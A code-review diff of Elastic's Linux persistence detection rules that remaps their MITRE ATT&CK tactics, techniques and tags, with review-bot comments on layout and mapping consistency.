@@ -164,15 +164,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -201,19 +193,19 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" [[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -229,10 +221,9 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml index 634b59f4e98..2c91b1b2964 100644 --- a/rules/linux/persistence_systemd_shell_execution.toml +++ b/rules/linux/persistence_systemd_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
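Review bot: In the second hunk (`@@ -229,10 +221,9 @@`) the blank line between the new `reference = "https://attack.mitre.org/tactics/TA0003/"` and `[rule.new_terms]` is dropped (the old blank is a `-` line with no replacement, and the line counts confirm none remains), so the tactic table now runs straight into the new-terms table. The rest of the file separates tables with one blank line; keep it here, and likewise in the exim4 rule hunk at L764 where `[rule.new_terms]` follows the new TA0001 `reference` line with no gap. Parsing is unaffected; this is layout only.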
@@ -78,15 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,19 +91,19 @@ process.parent.command_line == "/sbin/init" and process.args_count >= 2 framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -127,6 +119,6 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/linux/persistence_tainted_kernel_module_load.toml b/rules/linux/persistence_tainted_kernel_module_load.toml index 367963adfec..39f39886aa1 100644 --- a/rules/linux/persistence_tainted_kernel_module_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/23" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,14 +75,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" query = ''' @@ -112,11 +105,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
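Review bot: In the threat hunk (`@@ -112,11 +105,16 @@`) T1547.006 Kernel Modules and Extensions is added under a Privilege Escalation entry, with the `Tactic: Privilege Escalation` tag added to match, but the sibling rule `persistence_tainted_kernel_module_out_of_tree_load.toml` (L761) keeps the same T1547.006 technique under Persistence only and deletes its second tactic entirely. Both rules observe the same event class (a tainted module load), so either both should carry the Privilege Escalation entry or neither; as written, hunting by tactic returns one of the two. The Rootkit / T1014 removal itself is consistent between the two files.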
diff --git a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml index b1e5e98060a..423e1b87ade 100644 --- a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,14 +76,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -109,16 +102,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_udev_rule_creation.toml b/rules/linux/persistence_udev_rule_creation.toml index b58e6b0f925..d4279c8b34f 100644 --- a/rules/linux/persistence_udev_rule_creation.toml +++ b/rules/linux/persistence_udev_rule_creation.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,16 +128,16 @@ file.path like ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml index 6d45ba99f78..87713a3d441 100644 --- a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml +++ b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -112,43 +112,7 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml index 1b804697747..74a2dd1de26 100644 --- a/rules/linux/persistence_unusual_exim4_child_process.toml +++ b/rules/linux/persistence_unusual_exim4_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -58,14 +58,7 @@ references = [ risk_score = 21 rule_id = "6eb862bb-013d-4d4f-a14b-341433ca1a1f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -80,20 +73,27 @@ not process.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml index 962c7bb3a3f..3cc6949feda 100644 --- a/rules/linux/persistence_unusual_pam_grantor.toml +++ b/rules/linux/persistence_unusual_pam_grantor.toml 
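Review bot: The threat hunk (`@@ -80,20 +73,27 @@`) maps this rule to T1190 Exploit Public-Facing Application under Initial Access, but the detection is a `new_terms` rule on `process.executable` for an exim4 child, which observes post-exploitation process activity rather than the exploitation itself; the mapping is plausible for an internet-facing MTA but it is an inference, and the description should say so (or the Initial Access entry should stay tactic-only) so analysts do not read T1190 hits as confirmed exploitation. Separately, after this change the rule carries no Persistence tactic at all yet keeps the `persistence_` file-name prefix; the same mismatch appears in `persistence_web_server_sus_command_execution.toml` (L770, Execution only) and `persistence_web_server_sus_destination_port.toml` (L771, Command and Control only). If the repository names rule files by primary tactic, these want a rename in the same change; if not, ignore this part.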
@@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ Add Auditd Manager For this detection rule to trigger, no additional configuration is required. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -85,14 +77,19 @@ auditd.data.grantors:(* and not (pam_rootok or *pam_cap* or *pam_permit*)) framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" 
@@ -102,11 +99,15 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["auditd.data.grantors"] diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml index 9acdc41ffa3..92d8b579227 100644 --- a/rules/linux/persistence_unusual_sshd_child_process.toml +++ b/rules/linux/persistence_unusual_sshd_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,15 +53,7 @@ references = ["https://hadess.io/the-art-of-linux-persistence/"] risk_score = 21 rule_id = "4c3c6c47-e38f-4944-be27-5c80be973bd7" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
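Review bot: Across this hunk and the one at L765 the PAM rule ends up with T1556.003 Pluggable Authentication Modules under Defense Evasion and Persistence, while the Credential Access entry (`-id = "TA0006"`) and the `Tactic: Credential Access` tag are removed. ATT&CK lists T1556 under Credential Access as well, and an unexpected PAM grantor is the classic indicator of a credential-harvesting module, so dropping that tactic narrows the tactic-based hunting view for the case this rule is most likely to catch. Keeping a third `[[rule.threat]]` entry with `id = "TA0006"` / `name = "Credential Access"` and the same T1556.003 technique, plus the matching tag, seems preferable; if the narrowing is intentional, the description should explain it.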
@@ -77,24 +69,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -105,16 +79,6 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -123,11 +87,15 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_user_or_group_creation_or_modification.toml b/rules/linux/persistence_user_or_group_creation_or_modification.toml index 989aedbc3a6..9464079f355 100644 --- a/rules/linux/persistence_user_or_group_creation_or_modification.toml +++ b/rules/linux/persistence_user_or_group_creation_or_modification.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/06/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,6 +110,16 @@ event.action in ("changed-password", "added-user-account", "added-group-account- [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml index 9bf48a74d57..e1fcf81978d 100644 --- a/rules/linux/persistence_web_server_sus_child_spawned.toml +++ b/rules/linux/persistence_web_server_sus_child_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,16 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' 
@@ -193,24 +184,6 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -230,11 +203,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml index bd1fd7cbd10..f18d9334015 100644 --- a/rules/linux/persistence_web_server_sus_command_execution.toml +++ b/rules/linux/persistence_web_server_sus_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -89,16 +89,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Execution",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -178,24 +169,6 @@ from logs-endpoint.events.process-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -210,16 +183,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml
index 1c274eb2f45..9927329fab5 100644
--- a/rules/linux/persistence_web_server_sus_destination_port.toml
+++ b/rules/linux/persistence_web_server_sus_destination_port.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -80,16 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Execution",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -114,48 +105,12 @@ not cidrmatch(destination.ip, "127.0.0.0/8", "::1","FE80::/10", "FF00::/8", "10.
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[rule.threat.tactic]
-name = "Persistence"
-id = "TA0003"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1571"
+name = "Non-Standard Port"
+reference = "https://attack.mitre.org/techniques/T1571/"
 
 [rule.threat.tactic]
-name = "Command and Control"
 id = "TA0011"
+name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat.technique]]
-name = "Application Layer Protocol"
-id = "T1071"
-reference = "https://attack.mitre.org/techniques/T1071/"
diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml
index e8c298819bd..3b19de7ec1c 100644
--- a/rules/linux/persistence_web_server_unusual_command_execution.toml
+++ b/rules/linux/persistence_web_server_unusual_command_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/24"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -51,15 +51,7 @@ This rule detects shells invoked by web server processes on Linux to run one-off
 risk_score = 47
 rule_id = "65f28c4d-cfc8-4847-9cca-f2fb1e319151"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "Domain: Web",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "Domain: Web", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -97,24 +89,6 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -134,15 +108,19 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1505"
+name = "Server Software Component"
+reference = "https://attack.mitre.org/techniques/T1505/"
 
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique.subtechnique]]
+id = "T1505.003"
+name = "Web Shell"
+reference = "https://attack.mitre.org/techniques/T1505/003/"
 
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.command_line"]
diff --git a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml
index cfc4377bf4d..6eae96657f5 100644
--- a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml
+++ b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/25"
 integration = ["endpoint"]
 maturity = "production"
